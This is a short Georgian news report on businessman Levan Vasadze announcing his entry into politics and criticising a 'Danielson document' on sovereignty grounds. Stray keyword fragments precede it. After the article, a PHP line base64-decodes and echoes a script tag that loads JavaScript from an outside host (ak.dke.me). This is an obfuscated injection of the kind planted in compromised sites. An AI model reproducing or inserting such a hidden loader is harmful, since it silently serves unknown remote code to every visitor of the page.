celsiusi
ავერსი შნაიდერი
ბიზნესმენმა ლევან ვასაძემ დღეს, პრესკომფერენციაზე განაცხადა რომ პოლიტიკაში მოდის. 
 
მისივე განცხადებით, “ბოლო წვეთი”, რის გამოც პოლიტიკაში შემოსვლა გადაწყვიტა, იყო “დანიელსონის დოკუმენტზე ხელმოწერა”, რომელმაც, ვასაძის თქმით, დამნაშავეების გათავისუფლება განაპირობა და ქვეყნის სუვერენიტეტის შემცირება აჩვენა. მეგობრებთან ერთად გადაწყვიტა, საწყის ეტაპზე შექმნას საზოგადოებრივი მორაობა “ერთობა, რაობა, იმედი”, რომლის აბრევიატურა არის ერი, რომელიც დიდი ალბათობით, მომავალში პარტიად გარდაიქმნება.
 
„მივიღე ძალიან მძიმე გადაწყვეტილება, რომ საბოლოოდ დავემშვიდობო ჩემთვის ასე საყვარელი კერძო პირის მდგომარეობას და შემოვიდე ქვეყნის საზოგადოებრივ-პოლიტიკურ ცხოვრებაში.
 
ამ ჩემი გადაწყვტილების ძირითადი მიზეზად მოგვევილნა ის ფაქტი, რომ ქვეყანა შესული არის პერმანენტული კრიზისის პირობებში. ამ დოკუმეტში გარდა ძალიან მძიმე გადაწყვეტილებებისა – დამნაშავეების ციხიდან გამოშვებისა, მოხდა კიდევ უფრო დამაზიანებელი რამ – ქვეყნის სუვერენიტეტის უხეში ხელყოფა. აწი, თუ ეს დოკუმენტი განხორციელდება, ქვეყანას ისედაც შეზღუდული სუვერენიტეტი აღარ რჩება: სახელმწიფო უცხოელების ჩარევის გარეშე ვეღარ წყვეტს, ცესკომ როგორ დათვალოს ხმები, ვინ დანიშნოს მოსამართლედ და ვინ არა, როგორ ამუშაოს ანტიკორუფციული სტრუქტურები“, – განაცხადა ლევან ვასაძემ.
 
 
1293
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");